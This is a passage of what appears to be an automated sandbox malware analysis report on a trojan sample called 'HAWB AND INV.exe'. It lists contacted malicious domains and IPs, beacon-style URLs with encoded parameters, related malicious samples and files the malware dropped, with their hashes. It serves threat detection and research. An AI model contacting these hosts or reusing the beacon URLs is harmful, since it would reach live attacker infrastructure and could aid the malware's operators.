          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.ecosanhn.com/maw9/?AVF=cbTyfQFVyV4qwzSuB5gkHhMhd4ZKxxzMSggVhGr4392xKRAUAYS1aRQvNzIyvi+llhoR0m7eyA==&6l=sHbLpdw8x0Nx40%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.curvygirlholiday.com/maw9/?AVF=ueXSnp9RuZV4VGv1GREwgsKbz6ngTp3QynINalfLY22/qL3buQO/ZY9WhadtjkGC+9EglwJKpA==&6l=sHbLpdw8x0Nx40%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.premier-moment.info
          		202.254.234.152
          		truetrueunknown
          ecosanhn.com
          		181.214.142.2
          		truetrueunknown
          jaimericart.com
          		81.88.48.71
          		truetrueunknown
          networkingmaderas.com
          		107.180.57.119
          		truetrueunknown
          www.itechfreak.com
          		192.238.144.41
          		truefalse
            		unknown
            dinkoistmatrimony.com
            		34.102.136.180
            		truefalse
              		unknown
              curvygirlholiday.com
              		34.102.136.180
              		truefalse
                		unknown
                www.vipbrandwatch.info
                		unknown
                		unknowntrue
                  		unknown
                  www.networkingmaderas.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.beachrockisland.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.curvygirlholiday.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.dinkoistmatrimony.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.ecosanhn.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.jaimericart.com
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.premier-moment.info/maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx4true
                              • Avira URL Cloud: safe
                              		unknown
                              www.alldaazz.com/maw9/true
                              • Avira URL Cloud: safe
                              		low
                              http://www.networkingmaderas.com/maw9/?AVF=CxDYGZqaFGf+wggxXYaRsXxHYh0vkMvLuxQU/eiz8BKY71rUvugXdjEA5Q+gRIVecMz1lX5ZhQ==&6l=sHbLpdw8x0Nx4true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.dinkoistmatrimony.com/maw9/?AVF=4eDAg+VUuFTPb+HpMV2XwHXrAkW6c8A/v4D4zAieFew51h9R0F5m+f+tz7m/68XBKeAB57yd0w==&6l=sHbLpdw8x0Nx4false
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.ecosanhn.com/maw9/?AVF=cbTyfQFVyV4qwzSuB5gkHhMhd4ZKxxzMSggVhGr4392xKRAUAYS1aRQvNzIyvi+llhoR0m7eyA==&6l=sHbLpdw8x0Nx4true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.curvygirlholiday.com/maw9/?AVF=ueXSnp9RuZV4VGv1GREwgsKbz6ngTp3QynINalfLY22/qL3buQO/ZY9WhadtjkGC+9EglwJKpA==&6l=sHbLpdw8x0Nx4false
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000B.00000002.594031738.000000000095C000.00000004.00000020.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.fontbureau.comexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designersGexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.fontbureau.com/designers/?explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.founder.com.cn/cn/bTheexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designers?explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                            		high
                                            https://go.micropowershell.exe, 00000004.00000003.477109333.0000000005AE1000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://go.microX%powershell.exe, 00000002.00000003.453197763.0000000005250000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://www.tiro.comexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designersexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.goodfont.co.krexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://go.cpanel.net/privacyipconfig.exe, 00000017.00000002.598011304.0000000003162000.00000004.00000001.sdmpfalse
                                                		high
                                                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssHAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.carterandcone.comlexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.sajatypeworks.comexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.typography.netDexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.founder.com.cn/cn/cTheexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://fontfabrik.comexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.founder.com.cn/cnexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referipconfig.exe, 00000017.00000002.598011304.0000000003162000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.jiyu-kobo.co.jp/explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers8explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.fonts.comexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.sandoll.co.krexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.urwpp.deDPleaseexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.zhongyicts.com.cnexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameHAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.527445795.00000000048A1000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://www.sakkal.comexplorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://github.com/unguestHAWB AND INV.exefalse
                                                                  		high
                                                                  https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGPropertyHAWB AND INV.exefalse
                                                                    		high

                                                                    Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    181.214.142.2
                                                                    		ecosanhn.comChile
                                                                    		61317ASDETUKhttpwwwheficedcomGBtrue
                                                                    34.102.136.180
                                                                    		dinkoistmatrimony.comUnited States
                                                                    		15169GOOGLEUSfalse
                                                                    107.180.57.119
                                                                    		networkingmaderas.comUnited States
                                                                    		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                    202.254.234.152
                                                                    		www.premier-moment.infoJapan9371SAKURA-CSAKURAInternetIncJPtrue

                                                                    General Information

                                                                    Joe Sandbox Version:32.0.0 Black Diamond
                                                                    Analysis ID:402848
                                                                    Start date:03.05.2021
                                                                    Start time:14:51:24
                                                                    Joe Sandbox Product:CloudBasic
                                                                    Overall analysis duration:0h 13m 35s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:light
                                                                    Sample file name:HAWB AND INV.exe
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                    Number of analysed new started processes analysed:29
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:1
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • HDC enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.evad.winEXE@16/19@9/4
                                                                    EGA Information:Failed
                                                                    HDC Information:
                                                                    • Successful, ratio: 8.2% (good quality ratio 7.3%)
                                                                    • Quality average: 72%
                                                                    • Quality standard deviation: 32%
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 0
                                                                    • Number of non-executed functions: 0
                                                                    Cookbook Comments:
                                                                    • Adjust boot time
                                                                    • Enable AMSI
                                                                    • Found application associated with file extension: .exe
                                                                    Warnings:
                                                                    Show All
                                                                    • Excluded IPs from analysis (whitelisted): 13.88.21.125, 8.241.89.254, 8.238.29.254, 8.241.78.126, 8.238.29.126, 8.241.82.254, 40.88.32.150, 104.43.193.48, 13.64.90.137, 104.42.151.234, 20.50.102.62, 92.122.213.247, 92.122.213.249, 51.103.5.186, 52.155.217.156, 20.54.26.129, 40.64.100.89, 23.57.80.111
                                                                    • Excluded domains from analysis (whitelisted): mw1eap.displaycatalog.md.mp.microsoft.com.akadns.net, fg.download.windowsupdate.com.c.footprint.net, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, consumerrp-displaycatalog-aks2eap-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, download.windowsupdate.com, displaycatalog-uswesteap.md.mp.microsoft.com.akadns.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    14:52:21API Interceptor1x Sleep call for process: HAWB AND INV.exe modified
                                                                    14:53:05API Interceptor123x Sleep call for process: powershell.exe modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    202.254.234.15221AZZWCT.exeGet hashmaliciousBrowse
                                                                    • www.pantan-kobo.com/ol/?id=9T9Ti/oEbGV5XKb/DiI7+YlY2YrLu7Qh2NTby3V925jAJz0JnotPS3vF81WrTrt3b5ypKJfWDP5iksTuKzm8UQ==&tv=u4NhtX-XqfSpdX

                                                                    Domains

                                                                    No context

                                                                    ASN

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    AS-26496-GO-DADDY-COM-LLCUSInquiry 05042021.docGet hashmaliciousBrowse
                                                                    • 107.180.43.16
                                                                    don.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    Comand#U0103 de achizi#U021bie PP050321.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    O1E623TjjW.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    product specification.xlsxGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    9DWvynenEDJ11fY.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    ETC-B72-LT-0149-03-AR.exeGet hashmaliciousBrowse
                                                                    • 184.168.131.241
                                                                    SecuriteInfo.com.Heur.3869.xlsGet hashmaliciousBrowse
                                                                    • 192.186.217.35
                                                                    SecuriteInfo.com.Heur.3869.xlsGet hashmaliciousBrowse
                                                                    • 192.186.217.35
                                                                    SecuriteInfo.com.Heur.12433.xlsGet hashmaliciousBrowse
                                                                    • 192.186.217.35
                                                                    SecuriteInfo.com.Heur.12433.xlsGet hashmaliciousBrowse
                                                                    • 192.186.217.35
                                                                    Documents_1906038956_974385067.xlsGet hashmaliciousBrowse
                                                                    • 192.186.217.35
                                                                    Documents_1906038956_974385067.xlsGet hashmaliciousBrowse
                                                                    • 192.186.217.35
                                                                    Bill Of Lading & Packing List.pdf.gz.exeGet hashmaliciousBrowse
                                                                    • 107.180.44.132
                                                                    SecuriteInfo.com.Heur.3421.xlsGet hashmaliciousBrowse
                                                                    • 192.186.217.35
                                                                    SecuriteInfo.com.Heur.3421.xlsGet hashmaliciousBrowse
                                                                    • 192.186.217.35
                                                                    Xerox Scan_07122020181109.exeGet hashmaliciousBrowse
                                                                    • 50.62.160.30
                                                                    94a5cd81_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                    • 192.186.217.35
                                                                    Documents_585904356_2104184844.xlsGet hashmaliciousBrowse
                                                                    • 192.186.217.35
                                                                    ASDETUKhttpwwwheficedcomGBb8768PLUW1.exeGet hashmaliciousBrowse
                                                                    • 45.150.67.141
                                                                    z3hir.x86Get hashmaliciousBrowse
                                                                    • 45.10.156.162
                                                                    BVN1eAAgfj.exeGet hashmaliciousBrowse
                                                                    • 45.150.67.203
                                                                    Document_1097567093_03242021_Copy.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.23
                                                                    Document_1097567093_03242021_Copy.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.23
                                                                    efaxCanberraearlylearning_633.htmGet hashmaliciousBrowse
                                                                    • 191.101.50.240
                                                                    7728839942-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.244
                                                                    7728839942-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.244
                                                                    7728839942-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.244
                                                                    9642351931-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.243
                                                                    91844756223-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.243
                                                                    9497306271-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.243
                                                                    7122681326-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.244
                                                                    9497306271-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.243
                                                                    9497306271-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.243
                                                                    91237434194-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.243
                                                                    71559035622-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.244
                                                                    91237434194-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.243
                                                                    91237434194-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.243
                                                                    91408811036-04012021.xlsmGet hashmaliciousBrowse
                                                                    • 45.150.67.243

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HAWB AND INV.exe.log
                                                                    Process:C:\Users\user\Desktop\HAWB AND INV.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):1406
                                                                    Entropy (8bit):5.341099307467139
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmER:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHg
                                                                    MD5:E5FA1A53BA6D70E18192AF6AF7CFDBFA
                                                                    SHA1:1C076481F11366751B8DA795C98A54DE8D1D82D5
                                                                    SHA-256:1D7BAA6D3EB5A504FD4652BC01A0864DEE898D35D9E29D03EB4A60B0D6405D83
                                                                    SHA-512:77850814E24DB48E3DDF9DF5B6A8110EE1A823BAABA800F89CD353EAC7F72E48B13F3F4A4DC8E5F0FAA707A7F14ED90577CF1CB106A0422F0BEDD1EFD2E940E4
                                                                    Malicious:true
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):14734
                                                                    Entropy (8bit):4.993014478972177
                                                                    Encrypted:false
                                                                    SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                    MD5:8D5E194411E038C060288366D6766D3D
                                                                    SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                    SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                    SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                    Malicious:false
                                                                    Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):22300
                                                                    Entropy (8bit):5.601959909768602
                                                                    Encrypted:false
                                                                    SSDEEP:384:+tCDX0FD4MBB30CCancSBKn+ultIo867Y9gpSJUeRq1BMrmihZOAV7WTQyb64I+i:3MBB3tc4K+ultp8+pXepthTS/g
                                                                    MD5:241BCBB5F7AD903FBBCC8E06DD3DBEA8
                                                                    SHA1:96CF72B66B02F0D23AAADC975EA8433CA6B12497
                                                                    SHA-256:CAF362C288605DAB596260E52669FDC3515FEF5913EEB1ABF18AAB976098B2FA
                                                                    SHA-512:4557A6D914573A8EB8172289153D159FCB3856674E93ACC1DA0A9968175CCBC94ACC40B678A595FB639F6F4F28EBD19395DEBD4EC2DBADB94365B5C063A56E52
                                                                    Malicious:false
                                                                    Preview: @...e.................................<.4............@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_452t2rgn.y0w.psm1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ci5ca1ps.eac.psm1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kktv134m.r1n.ps1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4og0hre.avf.ps1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qa3iixpe.2p0.ps1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
